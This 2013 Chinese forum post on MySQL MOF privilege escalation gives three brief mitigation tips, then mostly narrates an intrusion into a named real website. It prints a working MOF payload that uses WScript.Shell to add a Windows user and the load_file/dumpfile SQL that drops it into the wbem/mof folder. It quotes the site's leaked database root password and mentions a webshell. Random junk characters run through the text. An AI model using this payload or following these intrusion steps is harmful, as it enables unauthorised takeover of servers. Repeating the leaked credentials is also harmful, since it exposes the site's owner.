Mysql mof扩展漏洞防范方法
- ~5 ]' _# S! @
5 v, a0 ] z% j6 Y$ |5 ?% D网上公开的一些利用代码:8 T" Z( E' @. l) {0 n& `
9 B1 h3 d! }! h! M% y
#pragma namespace(“\\\\.\\root\\subscription”). o/ p, H8 I/ v/ E' O, L
9 E o& J4 m0 |( D
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
4 ]2 D" e8 [. u5 T
! B% F* k1 I: g2 v; D& S
5 n0 Z& r8 z' p
/ ?6 \. N6 ?) v
9 x0 x( c( \. r. {) R
) h4 g0 g* Y8 ]" m% s0 c0 ]3 G n4 y连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
% G( J v! }* Y; u; E! M$ L) y0 c从上面代码来看得出解决办法:3 ?+ w: Q3 Y- p+ o4 D
6 N. m2 H% Z0 b/ k% V7 L8 q* i: w
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数4 T7 R2 a/ _4 ^+ ?" m
* L/ C: \' _# b2、禁止使用”WScript.Shel”组件% W# P5 e' D$ ~: ?) P
8 V% X9 P7 E3 k+ Y- w" K2 g3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
. V' o! b! o" [# t6 D+ m. [
! A5 G# s) h+ k6 u. Y! L* C当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
5 o4 W+ L$ t O$ `" n4 L, s @
m; }& h* H# M$ U$ }: n事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
9 G v6 z2 {7 F3 `0 L
( z% c( v( `# @; ^, [但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
; i( q+ b" W2 k! z, [9 z
2 Z, I' h9 s! ?: e, j看懂了后就开始练手吧
# _9 ]# g+ i7 C) g# G* o8 X6 E/ [: N8 ?0 [ O
http://www.webbmw.com/config/config_ucenter.php 一句话 a
. A6 I1 R: e' J5 i5 l
) z8 p' \! o" \( f0 G$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
' G5 O/ z$ I+ d- t/ A
8 V" j7 V* [4 e2 `于是直接用菜刀开搞0 f) j6 F' C# @9 U
2 b6 I( @+ P$ t' n3 E/ w
上马先
. l8 k, J' j- d0 m. E" O" }) F) r$ |
既然有了那些账号 之类的 于是我们就执行吧……., {" E a) C9 r( l
# ]( G% t z- _
小小的说下
' p& z( j& c/ Q( w! }4 g. ]( W. I4 c) F: R
在这里第1次执行未成功 原因未知
+ o4 R- S+ N5 q9 T9 @- F: ]4 ? I+ C# j% P7 E! g
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。& Q2 |8 Z/ K* v5 Q. [' W$ R
/ N$ `$ a9 j! t1 k, W6 d# C1 b#pragma namespace(“\\\\.\\root\\subscription”)
' Z0 v' v8 N# w3 q" Q; P
. b" F% T2 W. u0 v! {instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };+ y* d1 Z% G$ i7 `
" z! _6 C4 Z J
我是将文件放到C:\WINDOWS\temp\1.mof7 ^8 w) r* V* H+ C1 b
/ z; @& r& c9 w& `9 L0 J2 ]3 U0 H
所以我们就改下执行的代码$ i8 o9 b4 ^1 m* |9 ?' \1 c6 s3 [0 Y
5 t. Y0 o+ w/ S2 s4 j# wselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
. n( i; X' c s0 S: Z5 ^5 {( f) ^) P* O+ _$ G0 |- o! ~
4 j% l. H$ _2 _$ a0 i1 j/ O
7 l b. E, w5 K5 k& h; N& B; A
但是 你会发现账号还是没有躺在那里。。
@$ S2 c8 F& [7 h1 k+ j. P) G4 K+ O& r1 f+ t% ?
于是我就感觉蛋疼
7 K8 n3 ?5 o% f, K, l9 p7 k0 `
8 N% P+ @- M0 H- j, g就去一个一个去执行 但是执行到第2个 mysql时就成功了………
2 l2 W7 `7 H# k+ R+ f+ C
7 n! [+ e# q& o, S0 @+ l/ N. \3 Z
3 F4 m3 z# Z* d
但是其他库均不成功…
# t0 l( {3 x+ N% L0 g( t$ M- `' a# B7 [# h: ^3 d
我就很费解呀 到底为什么不成功求大牛解答…
: \- u( Q, W1 O8 c, {! |9 N# T& C) e* w8 `! A. I2 ?
. g6 w6 q0 O0 r3 [6 d s3 [6 d4 s4 _
|
发表于 2013-1-4 19:49:49
收藏
支持
反对